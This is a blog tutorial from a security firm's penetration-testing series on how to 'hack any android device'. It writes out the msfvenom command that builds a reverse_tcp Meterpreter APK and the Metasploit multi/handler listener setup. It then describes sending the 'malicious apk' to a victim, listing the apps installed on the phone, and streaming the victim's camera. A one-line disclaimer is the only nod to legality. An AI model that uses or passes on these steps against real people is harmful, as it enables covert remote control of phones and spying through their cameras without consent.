welcome you all for the series of blogs on android penetration testing .Today we will look for How To hack any android Device . There are some techniques that we can really hack any android device. So Today we will Learn How Metasploit framework help us to hack any android device. This Content is Exclusively for educational purposes Don’t use this technique for illegal activities.
System with Windows/ Linux/ Mac OS
We do this in our local environment for now, we can also do globally by port forwarding technique
How we can hack any Android mobile device using MSFvenom and Metasploit framework. Here, we will use MSFvenom for generating payload apk file and setup listener to Metasploit framework which manipulate Us and we can access victim device
For those who don’t know what is metasploit Metasploit is a penetration testing framework that makes hacking simple. It’s an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.
Now, We will first creating a malicious apk file using MSFvenon which help us to access and get control any one device, Lets Do,
For making malicious apk file we will use command:
→ msfvenom -p android/meterpreter/reverse_tcp LHOST=Yourserverip LPORT=setport4444 R> Myfake.apk
As above Picture Now we have successfully created our payload for shell execute
Here -p Refer as payload always make sure set Your local Host Server IP.Now, open Metasploit framework by typing command
Now we have successfully launch metasploit frame work You can also open it by manually it default with Kali Linux
Now, Here we will use metasploit msf console that exploits and contains various modules for android device , Now we will setup Listener we will use multi/handler for exploit by typing command:
→ use exploit/multi/handler
Now, we need to set meterpreter/reverse_tcp which generate deep Listener here we will use command:
→ set payload android/meterpreter/reverse_tcp
then we need to set LHOST to find lhost type ifconfig on your terminal ,
Here we will set lhost by typing command:
→ set LHOST
Then set LPORT By typing command:
→ set LPORT 4444
Now till here we have setup our malicious apk now it ready to send your victim and you can manipulate user device into your msfconsole session
Now, Turn For Another Step Now Install Application that we have created Using msfvenonm
Now As above Picture we have installed malicious application that we have created Now,
Now, navigate to your msf console And to gaining access Victim Device by typing command:
As above picture we have successfully able to gaining access Our target Android Device Now, we have Successfully Stared meterpreter session.
Now, Use help command to see the functionality
Now, Check for all the application available On Our target android device here it will show all application packages , application name which inside on Our target android device
here we will use command:
Now, We can access Victim camera By Typing command :
As above picture We can access victim Camera By msfconsole to access victim webcam stream we will use command:
As above picture Victim Webcam Live stream will Open Up on Our browser If victim running Webcam stream .
So we have successfully access control Our target Device using metasploit framework.
Download Metasploit : https://www.metasploit.com/
Stick with our Blog series to learn more.
For more interesting topics please visit https://securiumsolutions.com/
Our You tube channel : https://www.youtube.com/channel/UC-PEkJHE66uWpFf9nEq1nRA
Author: Pallab Jyoti Borah , VAPT Security Analyst